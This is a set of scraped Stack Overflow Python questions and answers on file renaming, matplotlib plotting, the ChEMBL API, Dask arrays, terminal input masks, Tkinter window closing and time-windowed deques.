stackoverflow_0074564993_multiprocessing_multithreading_python.txt
Q: Process files then modify filenames I am processing files in a directory and after processing a file I want to save it using the original name but also add xx to the file name. My purpose is to identify which files have been processed. Basic suggestions as to how to proceed are appreciated A: If the only purpose is flag the file in order to know which files have been processed I would try another strategy (adding file metadata or something). But from your question, I infer the only thing you need is a rename of the file after being processed... You can use os.rename: import os filename = "example.txt" flag_suffix = ".xx" with open(filename, "wb+") as f: # process file ... os.rename(filename, f"{filename}{flag_suffix}")
Process files then modify filenames
I am processing files in a directory and after processing a file I want to save it using the original name but also add xx to the file name. My purpose is to identify which files have been processed. Basic suggestions as to how to proceed are appreciated
[ "If the only purpose is flag the file in order to know which files have been processed I would try another strategy (adding file metadata or something). But from your question, I infer the only thing you need is a rename of the file after being processed... You can use os.rename:\nimport os\n\nfilename = \"example.txt\"\nflag_suffix = \".xx\"\n\n\nwith open(filename, \"wb+\") as f:\n # process file\n ...\n\nos.rename(filename, f\"{filename}{flag_suffix}\")\n\n" ]
[ 1 ]
[]
[]
[ "python" ]
stackoverflow_0074592573_python.txt
Q: i was asked to plot a sinus function in Python. Instead of using np.sin we are supposed to import a file called mdt the code on the file looks like this: import numpy as np import math from scipy.fftpack import fft import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation sd_found = False try: import sounddevice as sd sd_found = True except: print('Das Modul "sounddevice" fehlt. Es lässt sich per "pip install sounddevice" im "Anaconda Prompt" installieren.') def playSound(sound, fs): sd.play(sound/10, fs) def spectrum(Messwerte, Abtastrate): N=len(Messwerte) u_cmplx=fft(Messwerte) u_abs=np.abs(u_cmplx[0:N//2])/N u_abs[1:] *= 2 f=np.linspace(0,Abtastrate//2,N//2) return (f,u_abs) def dataRead(**kwargs): argListMust = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType'} argList = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType', 'continues'} for key in kwargs: if key not in argList: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None for key in argListMust: if key not in kwargs: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None amplitude = kwargs['amplitude'] samplingRate = kwargs['samplingRate'] duration = kwargs['duration'] channels = kwargs['channels'] resolution = kwargs['resolution'] outType = kwargs['outType'] if 'continues' not in kwargs.keys(): continues = False else: continues = kwargs['continues'] if type(continues) != bool: print('continues muss vom Typ bool sein') return None if not all(i < 4 for i in channels): print('Mögliche Kanäle sind 0 bis 4') return None if len(channels) > len(set(channels)): print('Kanäle dürfen nicht doppelt auftauchen') return None outtType = outType.capitalize() if outtType != 'Volt' and outtType != 'Codes': print(outtType) print('outType = \'Volt\' oder \'Codes\'') return None u_lsb = 2*amplitude/(2**resolution-1) bins = [-amplitude+u_lsb/2+u_lsb*i for i in range(2**resolution-1)] ai_voltage_rngs = [1,2,5,10] if amplitude not in ai_voltage_rngs: print('Unterstützt werden folgende Amplituden:') print(ai_voltage_rngs) return None for channel in channels: if resolution < 1 or resolution > 14: print(f'Die Auflösung muss zwischen 1 und 14 Bit liegen') return None if samplingRate > 48000: print(f'Mit dieser Kanalanzahl beträgt die höchste Abtastrate 48000 Hz:') return None if continues: print('Die Liveansicht ist nicht verfügbar.') else: t = np.arange(0,duration,1/samplingRate) data = np.zeros( (len(channels),t.size)) data[0,:] = 2.5*np.sin(2*np.pi*50*t+np.random.rand()*np.pi*2) data[data>amplitude] = amplitude data[data<-amplitude] = -amplitude data = np.digitize(data,bins) if outtType == 'Volt': data = data*u_lsb-amplitude print(f"Die Messung wurde durchgeführt mit einer virtuellen Messkarte \n Messbereich: +/-{amplitude:1.2f} Volt\n samplingRate: {samplingRate:1.1f} Hz\n Messdauer: {duration:1.3f} s\n Auflösung: {resolution:d} bit\n Ausgabe in: {outtType:s}") return data my code looks like this and when i plot i get a blank figure: import numpy as np import matplotlib.pyplot as plt import mdt data = mdt.dataRead(amplitude = 5,samplingRate = 48,duration = 10,channels = [0],resolution = 14,outType = 'Volt',continues=False) z = np.linspace(0,0.02,80) plt.plot(data) A: I figured it out. I will leave the correct code to this task below if interested check it out. import numpy as np import matplotlib.pyplot as plt import mdt data =read=mdt.dataRead(**{'amplitude': 5,'samplingRate':48000,'duration':0.2,'channels':[0],'resolution':14,'outType':'volt'}) data1 = data[0] np.save('messung.npy',data1) Mess=np.load('messung.npy') y = Mess[100:550] t = np.linspace(0,0.02,Mess.shape[0]) t_1 = t[100:550] plt.figure(1) plt.subplot(2,1,1) plt.plot(t,Mess) plt.xlabel("Zeit(ms)") plt.ylabel("Spannung(V)") plt.title("Messung der Karte") plt.subplot(2,1,2) plt.plot(t_1,y,'red') plt.xlabel("Zeit(s)") plt.ylabel("Spannung(V)") plt.title("Ausschnitt der Messung") plt.tight_layout() This was originally added as revision 5 of the question.
i was asked to plot a sinus function in Python. Instead of using np.sin we are supposed to import a file called mdt
the code on the file looks like this: import numpy as np import math from scipy.fftpack import fft import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation sd_found = False try: import sounddevice as sd sd_found = True except: print('Das Modul "sounddevice" fehlt. Es lässt sich per "pip install sounddevice" im "Anaconda Prompt" installieren.') def playSound(sound, fs): sd.play(sound/10, fs) def spectrum(Messwerte, Abtastrate): N=len(Messwerte) u_cmplx=fft(Messwerte) u_abs=np.abs(u_cmplx[0:N//2])/N u_abs[1:] *= 2 f=np.linspace(0,Abtastrate//2,N//2) return (f,u_abs) def dataRead(**kwargs): argListMust = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType'} argList = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType', 'continues'} for key in kwargs: if key not in argList: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None for key in argListMust: if key not in kwargs: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None amplitude = kwargs['amplitude'] samplingRate = kwargs['samplingRate'] duration = kwargs['duration'] channels = kwargs['channels'] resolution = kwargs['resolution'] outType = kwargs['outType'] if 'continues' not in kwargs.keys(): continues = False else: continues = kwargs['continues'] if type(continues) != bool: print('continues muss vom Typ bool sein') return None if not all(i < 4 for i in channels): print('Mögliche Kanäle sind 0 bis 4') return None if len(channels) > len(set(channels)): print('Kanäle dürfen nicht doppelt auftauchen') return None outtType = outType.capitalize() if outtType != 'Volt' and outtType != 'Codes': print(outtType) print('outType = \'Volt\' oder \'Codes\'') return None u_lsb = 2*amplitude/(2**resolution-1) bins = [-amplitude+u_lsb/2+u_lsb*i for i in range(2**resolution-1)] ai_voltage_rngs = [1,2,5,10] if amplitude not in ai_voltage_rngs: print('Unterstützt werden folgende Amplituden:') print(ai_voltage_rngs) return None for channel in channels: if resolution < 1 or resolution > 14: print(f'Die Auflösung muss zwischen 1 und 14 Bit liegen') return None if samplingRate > 48000: print(f'Mit dieser Kanalanzahl beträgt die höchste Abtastrate 48000 Hz:') return None if continues: print('Die Liveansicht ist nicht verfügbar.') else: t = np.arange(0,duration,1/samplingRate) data = np.zeros( (len(channels),t.size)) data[0,:] = 2.5*np.sin(2*np.pi*50*t+np.random.rand()*np.pi*2) data[data>amplitude] = amplitude data[data<-amplitude] = -amplitude data = np.digitize(data,bins) if outtType == 'Volt': data = data*u_lsb-amplitude print(f"Die Messung wurde durchgeführt mit einer virtuellen Messkarte \n Messbereich: +/-{amplitude:1.2f} Volt\n samplingRate: {samplingRate:1.1f} Hz\n Messdauer: {duration:1.3f} s\n Auflösung: {resolution:d} bit\n Ausgabe in: {outtType:s}") return data my code looks like this and when i plot i get a blank figure: import numpy as np import matplotlib.pyplot as plt import mdt data = mdt.dataRead(amplitude = 5,samplingRate = 48,duration = 10,channels = [0],resolution = 14,outType = 'Volt',continues=False) z = np.linspace(0,0.02,80) plt.plot(data)
[ "I figured it out. I will leave the correct code to this task below if interested check it out.\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport mdt\ndata =read=mdt.dataRead(**{'amplitude': 5,'samplingRate':48000,'duration':0.2,'channels':[0],'resolution':14,'outType':'volt'})\ndata1 = data[0]\nnp.save('messung.npy',data1)\nMess=np.load('messung.npy')\ny = Mess[100:550]\nt = np.linspace(0,0.02,Mess.shape[0])\nt_1 = t[100:550]\nplt.figure(1)\nplt.subplot(2,1,1)\nplt.plot(t,Mess)\nplt.xlabel(\"Zeit(ms)\")\nplt.ylabel(\"Spannung(V)\")\nplt.title(\"Messung der Karte\")\n\nplt.subplot(2,1,2)\nplt.plot(t_1,y,'red')\nplt.xlabel(\"Zeit(s)\")\nplt.ylabel(\"Spannung(V)\")\nplt.title(\"Ausschnitt der Messung\")\nplt.tight_layout()\n\n\nThis was originally added as revision 5 of the question.\n" ]
[ 0 ]
[]
[]
[ "matplotlib", "numpy", "python" ]
stackoverflow_0074586925_matplotlib_numpy_python.txt
Q: How to use the ChEMBL API to download the chembldescriptors? I have a .csv with Molecule ChEMBL IDs, and I can't find the code to download the chembldescriptors of that set of molecules. Specifically, I want to download: 'TPSA', 'NumHAcceptors', 'NumHDonors', 'CX Acidic pKa', 'CX Basic pKa', 'qed'. A: the starting point is not a .csv, but I can get all the information through the API (for python) from chembl_webresource_client.new_client import new_client import pandas as pd #activity API: activities = new_client.activity.filter(target_chembl_id__in = ['CHEMBL1824'] #erbB-2 ).filter(standard_type = "IC50" , IC50_value__lte = 10000 , assay_type = 'B' #Only look for Binding Assays ).only(['molecule_chembl_id', 'ic50_value']) act_df = pd.DataFrame(activities) #find the list of compounds that are within the act_df dataframe: cmpd_chembl_ids = list(set(act_df['molecule_chembl_id'])) #molecule API molecules = new_client.molecule.filter(molecule_chembl_id__in = cmpd_chembl_ids ).only([ 'molecule_chembl_id', 'molecule_properties']) mol_df = pd.DataFrame(molecules) #mol_df # Convert nested cells (ie those containing a dictionary) to individual columns in the dataframe mol_df['qed_weighted'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['qed_weighted']) #mol_df['cx_logd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logd']) #mol_df['cx_logp'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logp']) mol_df['cx_most_apka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_apka']) mol_df['cx_most_bpka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_bpka']) mol_df['hba'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hba']) mol_df['hbd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hbd']) mol_df['psa'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['psa'])
How to use the ChEMBL API to download the chembldescriptors?
I have a .csv with Molecule ChEMBL IDs, and I can't find the code to download the chembldescriptors of that set of molecules. Specifically, I want to download: 'TPSA', 'NumHAcceptors', 'NumHDonors', 'CX Acidic pKa', 'CX Basic pKa', 'qed'.
[ "the starting point is not a .csv, but I can get all the information through the API (for python)\nfrom chembl_webresource_client.new_client import new_client\nimport pandas as pd\n#activity API:\nactivities = new_client.activity.filter(target_chembl_id__in = ['CHEMBL1824'] #erbB-2\n ).filter(standard_type = \"IC50\"\n , IC50_value__lte = 10000 \n , assay_type = 'B' #Only look for Binding Assays\n ).only(['molecule_chembl_id', 'ic50_value'])\nact_df = pd.DataFrame(activities)\n#find the list of compounds that are within the act_df dataframe:\ncmpd_chembl_ids = list(set(act_df['molecule_chembl_id']))\n#molecule API\nmolecules = new_client.molecule.filter(molecule_chembl_id__in = cmpd_chembl_ids \n ).only([ 'molecule_chembl_id', 'molecule_properties'])\nmol_df = pd.DataFrame(molecules)\n#mol_df\n# Convert nested cells (ie those containing a dictionary) to individual columns in the dataframe\nmol_df['qed_weighted'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['qed_weighted'])\n#mol_df['cx_logd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logd'])\n#mol_df['cx_logp'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logp'])\nmol_df['cx_most_apka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_apka'])\nmol_df['cx_most_bpka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_bpka'])\nmol_df['hba'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hba'])\nmol_df['hbd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hbd'])\nmol_df['psa'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['psa'])\n\n" ]
[ 0 ]
[]
[]
[ "api", "cheminformatics", "python" ]
stackoverflow_0074562889_api_cheminformatics_python.txt
Q: Cannot assign int in Dask array I'm having trouble doing a simple operation: assigning a value to a dask array. I get the error: "Item assignment with <class 'int'> not supported" Does anybody know why ? This should normally be doable according to the dask documentation... Here's the (elementary) "chunk" of code that I'm having trouble with. Problem occurs because of the line "x[0] = 1.0" import dask.array as da x = da.zeros(10) x[0] = 1.0 If you read this message and know how to help me that'd be really nice ! :) A: Works for me - so this is probably an issue with the version of Dask that you are using. $ python Python 3.10.8 (main, Nov 24 2022, 14:13:03) [GCC 11.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import dask >>> import dask.array as da >>> x = da.zeros(10) >>> x[0] = 1.0 >>> x.compute() array([1., 0., 0., 0., 0., 0., 0., 0., 0., 0.]) >>> dask.__version__ '2022.7.0'
Cannot assign int in Dask array
I'm having trouble doing a simple operation: assigning a value to a dask array. I get the error: "Item assignment with <class 'int'> not supported" Does anybody know why ? This should normally be doable according to the dask documentation... Here's the (elementary) "chunk" of code that I'm having trouble with. Problem occurs because of the line "x[0] = 1.0" import dask.array as da x = da.zeros(10) x[0] = 1.0 If you read this message and know how to help me that'd be really nice ! :)
[ "Works for me - so this is probably an issue with the version of Dask that you are using.\n$ python\nPython 3.10.8 (main, Nov 24 2022, 14:13:03) [GCC 11.2.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import dask\n>>> import dask.array as da\n>>> x = da.zeros(10)\n>>> x[0] = 1.0\n>>> x.compute()\narray([1., 0., 0., 0., 0., 0., 0., 0., 0., 0.])\n>>> dask.__version__\n'2022.7.0'\n\n" ]
[ 0 ]
[]
[]
[ "arrays", "assign", "dask", "python" ]
stackoverflow_0074592681_arrays_assign_dask_python.txt
Q: INPUT FORMAT COMPLIANCE: a date prompt with 3 mutable input fields separated by 2 static forward slashes, with set ranges for each feild I am trying to create a prompt that is either separated by hard slashes or slashes appear after specified input range, all on a single line. i want: Enter your age (M/D/Y): int / int / int #where the slashes are fixed and part of the prompt not: M: D: Y: example: Enter the date M/D/Y: '12'**/**'12'**/**'1234' 0,1,/ 0,1,/ Ideal: the slashes are static but the input fields between are mutable, and cursor skips slashes. **or:**the slash appears after populating the specified range...and the integer input field ranges would be set at 0:1,0:1,0:3 (mm) if users enters two integers, backslash appears (dd) if users enters two integers, backslash appears (yyyy) user completes the range (or not) User is unable to enter subsequent integers out of range. nothing seemed to be what I'm after. the closest info i could find was using datetime but that just sorts out the input, i want actual hard slashes to appear, separating the input fields, or appear after input and stay. printing it like that isn't an issue, and the integer input field ranges would be set at 0:1,0:1,0:3 being a noob i'm not certain if py is even capable of such a demand. A: #A solution was provided elsewhere, posting with Author's permission. """PINPUT, AN INPUT FORMAT COMPLIANCE MODULE FOR DATE/TIME ENTRY""" " AUTHOR: INDRAJIT MAJUMDAR " import sys   try: #for windows platform. from msvcrt import getwch as getch except ImportError: #for linux, darwin (osx), and other unix distros. def getch(): """ Gets a single character from STDIO. """ import sys import tty import termios fd = sys.stdin.fileno() old = termios.tcgetattr(fd) try: tty.setraw(fd) return sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old)   def flsp_input(prmt, ptrn, otyp="t"): #otyp=[s=string, t=tuple, p=ptrn] """ --flsp_input: --Fixed Length Slotted Pattern Input [int, str]-- Licence: opensource Version: 1.1 Author : indramobj2@gmail.com """ def fout(ts, ptrn, otyp): fs, tpl = 0, [] for i, p in enumerate(ptrn): if p[2] == "": csd = ts[fs:] else: fi = ts[fs:].find(p[2]) if fi == -1: csd = ts[fs:] else: csd = ts[fs:fs+fi] fs += p[1]+len(p[2]) if otyp == "s": out = ts if otyp == "t": tpl.append(csd) if otyp == "p": ptrn[i].append(csd) if otyp == "s": out = fout if otyp == "t": out = tuple(tpl) if otyp == "p": out = ptrn return out i, ts, plts, = 0, "", 0 ptxt = "".join([f"{'_'*e[1]}{e[2]}" for e in ptrn]) print(f"{prmt}{ptxt}\r{prmt}", end="") sys.stdout.flush() while i < len(ptrn): ptype, plen, psep = ptrn[i] while True: cc = getch() if ord(cc) == 127: #bksp frm = 0 if i == 0 else ts.rfind(ptrn[i-1][2])+1 cplf = ts[frm:] bkstp = 2 if cplf == "" and i != 0 else 1 ts = ts[:len(ts)-bkstp] if bkstp == 2: i -= 1 ptype, plen, psep = ptrn[i] plts = sum((ptrn[j][1]+len(ptrn[j][2]) for j in range(i))) print(f"\r{prmt}{ptxt}\r{prmt}{ts}", end="") continue if ord(cc) == 13: #enter print() return fout(ts, ptrn, otyp) try: cc = int(cc) except ValueError: cc = cc if type(cc) is ptype: cc = str(cc) ts += cc print(cc, end="") sys.stdout.flush() if len(ts) - plts == plen: print(psep, end="") ts += psep plts = len(ts) sys.stdout.flush() break i += 1 print() return fout(ts, ptrn, otyp)   if __name__ == "__main__": prmt = "Input Date and Time: " ptrn = [[int, 2, "/"], [int, 2, "/"], [int, 4, " "], [int, 2, ":"], [int, 2, ":"], [int, 2, "."], [int, 3, " "], [str, 2, ""]] #ptrn = [[str, 2, ":"], [int, 2, " "], [str, 1, " "], # [int, 4, ""]] ts = pinput(prmt, ptrn) print(f"{ts=}")
INPUT FORMAT COMPLIANCE: a date prompt with 3 mutable input fields separated by 2 static forward slashes, with set ranges for each feild
I am trying to create a prompt that is either separated by hard slashes or slashes appear after specified input range, all on a single line. i want: Enter your age (M/D/Y): int / int / int #where the slashes are fixed and part of the prompt not: M: D: Y: example: Enter the date M/D/Y: '12'**/**'12'**/**'1234' 0,1,/ 0,1,/ Ideal: the slashes are static but the input fields between are mutable, and cursor skips slashes. **or:**the slash appears after populating the specified range...and the integer input field ranges would be set at 0:1,0:1,0:3 (mm) if users enters two integers, backslash appears (dd) if users enters two integers, backslash appears (yyyy) user completes the range (or not) User is unable to enter subsequent integers out of range. nothing seemed to be what I'm after. the closest info i could find was using datetime but that just sorts out the input, i want actual hard slashes to appear, separating the input fields, or appear after input and stay. printing it like that isn't an issue, and the integer input field ranges would be set at 0:1,0:1,0:3 being a noob i'm not certain if py is even capable of such a demand.
[ "#A solution was provided elsewhere, posting with Author's permission.\n\n\"\"\"PINPUT, AN INPUT FORMAT COMPLIANCE MODULE FOR DATE/TIME ENTRY\"\"\"\n\" AUTHOR: INDRAJIT MAJUMDAR \"\n\n import sys\n \ntry:\n #for windows platform.\n from msvcrt import getwch as getch\nexcept ImportError:\n #for linux, darwin (osx), and other unix distros.\n def getch():\n \"\"\"\n Gets a single character from STDIO.\n \"\"\"\n import sys\n import tty\n import termios\n fd = sys.stdin.fileno()\n old = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n return sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old)\n \ndef flsp_input(prmt, ptrn, otyp=\"t\"): #otyp=[s=string, t=tuple, p=ptrn]\n \"\"\"\n --flsp_input:\n --Fixed Length Slotted Pattern Input [int, str]--\n Licence: opensource\n Version: 1.1\n Author : indramobj2@gmail.com\n \"\"\"\n def fout(ts, ptrn, otyp):\n fs, tpl = 0, []\n for i, p in enumerate(ptrn):\n if p[2] == \"\":\n csd = ts[fs:]\n else:\n fi = ts[fs:].find(p[2])\n if fi == -1:\n csd = ts[fs:]\n else:\n csd = ts[fs:fs+fi]\n fs += p[1]+len(p[2])\n if otyp == \"s\": out = ts\n if otyp == \"t\": tpl.append(csd)\n if otyp == \"p\": ptrn[i].append(csd)\n if otyp == \"s\": out = fout\n if otyp == \"t\": out = tuple(tpl)\n if otyp == \"p\": out = ptrn\n return out\n \n i, ts, plts, = 0, \"\", 0\n ptxt = \"\".join([f\"{'_'*e[1]}{e[2]}\" for e in ptrn])\n print(f\"{prmt}{ptxt}\\r{prmt}\", end=\"\")\n sys.stdout.flush()\n while i < len(ptrn):\n ptype, plen, psep = ptrn[i]\n while True:\n cc = getch()\n if ord(cc) == 127: #bksp\n frm = 0 if i == 0 else ts.rfind(ptrn[i-1][2])+1\n cplf = ts[frm:]\n bkstp = 2 if cplf == \"\" and i != 0 else 1\n ts = ts[:len(ts)-bkstp]\n if bkstp == 2: i -= 1\n ptype, plen, psep = ptrn[i]\n plts = sum((ptrn[j][1]+len(ptrn[j][2]) for j in range(i)))\n print(f\"\\r{prmt}{ptxt}\\r{prmt}{ts}\", end=\"\")\n continue\n if ord(cc) == 13: #enter\n print()\n return fout(ts, ptrn, otyp)\n try:\n cc = int(cc)\n except ValueError:\n cc = cc\n if type(cc) is ptype:\n cc = str(cc)\n ts += cc\n print(cc, end=\"\")\n sys.stdout.flush()\n if len(ts) - plts == plen:\n print(psep, end=\"\")\n ts += psep\n plts = len(ts)\n sys.stdout.flush()\n break\n i += 1\n print()\n return fout(ts, ptrn, otyp)\n \nif __name__ == \"__main__\":\n prmt = \"Input Date and Time: \"\n ptrn = [[int, 2, \"/\"], [int, 2, \"/\"], [int, 4, \" \"],\n [int, 2, \":\"], [int, 2, \":\"], [int, 2, \".\"],\n [int, 3, \" \"], [str, 2, \"\"]]\n #ptrn = [[str, 2, \":\"], [int, 2, \" \"], [str, 1, \" \"],\n # [int, 4, \"\"]]\n ts = pinput(prmt, ptrn)\n print(f\"{ts=}\")\n\n" ]
[ 0 ]
[]
[]
[ "datetime", "input", "python" ]
stackoverflow_0074506956_datetime_input_python.txt
Q: Does the results indicate that the list(position) is not updated or there is something wrong with the equation? I am writing a code to update a position of a ball after it being kicked at a given angle and velocity after a certain time passed. Does the results indicate that the list(position) is not updated or there is something wrong with the equation? import numpy as np class Ball(): def __init__(self, theta, v): self.position = [0, 0] # Position at ground is (0,0) self.theta = 0 self.v = 0 def step(self, delta_t = .1): ball.position[0] = ball.v*np.cos(ball.theta)*t ball.position[1] = (ball.v**2*np.sin(ball.theta))/9.81 return ball.position ball = Ball(theta = 30, v = 100) for t in range(200): ball.step(delta_t = 0.05) print(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position Output = Ball is at x=0.00m, y=0.00m A: There were a few bugs in your code, I've altered it to do what I believe you intend it to do below: import numpy as np class Ball(): def __init__(self, theta, v): self.position = [0, 0] # Position at ground is (0,0) self.theta = theta self.v = v def step(self, delta_t = .1): self.position[0] = self.v*np.cos(self.theta)*delta_t self.position[1] = (self.v**2*np.sin(self.theta))/9.81 return self.position ball = Ball(theta = 30, v = 100) for t in range(200): ball.step(delta_t = 0.05) print(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position With the result: Ball is at x=0.77m, y=-1007.17m Explanation First, your __init__ method simply set self.theta and self.v to 0, instead of setting them equal to the values provided when initialising the ball object. Second, your step method relied upon something called t, instead of delta_t which is what you actually rely upon in your defintion of step. Finally, in your step method, you seem to be relying on ball.XYZ instead of self.XYZ. Correcting all of these, I believe, makes the class function as you wish it to - whether the calculation is correct, I'll leave to you to determine. Note If what you're trying to do is plot the trajectory of a ball in free fall, you should probably update self.v and self.theta with every call of self.step(). Currently, self.step() returns where the ball will be after a given interval of time from its initial condition. If you're trying to step incrementally - with every call of self.step(), the current self.v and current self.theta of the ball will be different after every call of self.step() - but your self.step() definition currently takes no account of this.
Does the results indicate that the list(position) is not updated or there is something wrong with the equation?
I am writing a code to update a position of a ball after it being kicked at a given angle and velocity after a certain time passed. Does the results indicate that the list(position) is not updated or there is something wrong with the equation? import numpy as np class Ball(): def __init__(self, theta, v): self.position = [0, 0] # Position at ground is (0,0) self.theta = 0 self.v = 0 def step(self, delta_t = .1): ball.position[0] = ball.v*np.cos(ball.theta)*t ball.position[1] = (ball.v**2*np.sin(ball.theta))/9.81 return ball.position ball = Ball(theta = 30, v = 100) for t in range(200): ball.step(delta_t = 0.05) print(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position Output = Ball is at x=0.00m, y=0.00m
[ "There were a few bugs in your code, I've altered it to do what I believe you intend it to do below:\nimport numpy as np\n\nclass Ball():\n def __init__(self, theta, v):\n self.position = [0, 0] # Position at ground is (0,0)\n self.theta = theta\n self.v = v\n \n def step(self, delta_t = .1):\n self.position[0] = self.v*np.cos(self.theta)*delta_t\n self.position[1] = (self.v**2*np.sin(self.theta))/9.81\n return self.position\n \n \n \nball = Ball(theta = 30, v = 100)\n\nfor t in range(200):\n ball.step(delta_t = 0.05)\n\nprint(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position\n\nWith the result:\nBall is at x=0.77m, y=-1007.17m\n\nExplanation\nFirst, your __init__ method simply set self.theta and self.v to 0, instead of setting them equal to the values provided when initialising the ball object.\nSecond, your step method relied upon something called t, instead of delta_t which is what you actually rely upon in your defintion of step.\nFinally, in your step method, you seem to be relying on ball.XYZ instead of self.XYZ.\nCorrecting all of these, I believe, makes the class function as you wish it to - whether the calculation is correct, I'll leave to you to determine.\nNote\nIf what you're trying to do is plot the trajectory of a ball in free fall, you should probably update self.v and self.theta with every call of self.step(). Currently, self.step() returns where the ball will be after a given interval of time from its initial condition. If you're trying to step incrementally - with every call of self.step(), the current self.v and current self.theta of the ball will be different after every call of self.step() - but your self.step() definition currently takes no account of this.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592731_python.txt
Q: Tkinter python not terminating the program import tkinter global win1,win2, win3 def win1_open(): global win1 win1 = tkinter.Tk() win1.geometry('500x500') button_next = tkinter.Button(win1, text='Next', width=8, command=win2_open) button_next.place(x=100 * 2 + 80, y = 100) win1.mainloop() def win2_open(): global win2 win2 = tkinter.Tk() win2.geometry('500x500') button_next = tkinter.Button(win2, text='Next', width=8, command=win3_open) button_next.place(x=100 * 2 + 80, y=100) win2.mainloop() def win3_open(): global win3 win3 = tkinter.Tk() win3.geometry('500x500') button_exit = tkinter.Button(win3, text='Exit', width=8, command=exit_program) button_exit.place(x=100 * 2 + 80, y=100) win3.mainloop() def exit_program(): global win1, win2, win3 win1.quit() win2.quit() win3.quit() win1_open() The third window has Exit button that I have used to terminate the program. It terminates the program but only after I click Exit button thrice. How to terminate the program on one button click? A: Instead of using quit(), you should use destory() def exit_program(): global win1, win2, win3 win1.destroy() win2.destroy() win3.destroy() To learn more about the difference between these 2 function, you can refer to this: How do I close a tkinter Window? A: Change the calls in exit_program() to .destroy() instead of .quit() Also, it's not necessary to have more than one .mainloop() in your Tkinter program. One mainloop suffices.
Tkinter python not terminating the program
import tkinter global win1,win2, win3 def win1_open(): global win1 win1 = tkinter.Tk() win1.geometry('500x500') button_next = tkinter.Button(win1, text='Next', width=8, command=win2_open) button_next.place(x=100 * 2 + 80, y = 100) win1.mainloop() def win2_open(): global win2 win2 = tkinter.Tk() win2.geometry('500x500') button_next = tkinter.Button(win2, text='Next', width=8, command=win3_open) button_next.place(x=100 * 2 + 80, y=100) win2.mainloop() def win3_open(): global win3 win3 = tkinter.Tk() win3.geometry('500x500') button_exit = tkinter.Button(win3, text='Exit', width=8, command=exit_program) button_exit.place(x=100 * 2 + 80, y=100) win3.mainloop() def exit_program(): global win1, win2, win3 win1.quit() win2.quit() win3.quit() win1_open() The third window has Exit button that I have used to terminate the program. It terminates the program but only after I click Exit button thrice. How to terminate the program on one button click?
[ "Instead of using quit(), you should use destory()\ndef exit_program():\n global win1, win2, win3\n win1.destroy()\n win2.destroy()\n win3.destroy()\n\nTo learn more about the difference between these 2 function, you can refer to this:\nHow do I close a tkinter Window?\n", "Change the calls in exit_program() to .destroy() instead of .quit()\nAlso, it's not necessary to have more than one .mainloop() in your Tkinter program. One mainloop suffices.\n" ]
[ 1, 0 ]
[]
[]
[ "python", "tkinter", "user_interface" ]
stackoverflow_0074588453_python_tkinter_user_interface.txt
Q: Deque to keep last few minutes in Python I'd like to keep the last 10 minutes of a time series in memory with some sort of deque system in Python. Right now I'm using deque but I may receive 100 data points in few seconds and then nothing for few seconds. Any idea ? I read something about FastRBTree in a post but it dated back to 2014. Is there any better solution now? I am mostly interested in computing the standard deviation over a fixed period of time, So the less data I receive within that fixed period of time, the less the standard deviation will be A: If you are concerned about container size, "simplest" thing might be to use the deque and just set a maxlen argument and then as it overflows, the oldest adds are just lost, but that does not guarantee 10 minutes worth obviously. But it is an efficient data structure for this. If you want to "trim by time in deque" then you probably need to create a custom class that can hold the data and a timestamp of some kind and then periodically poll the end of the deque for the time of the earliest item and keep popping until you are no later than current time 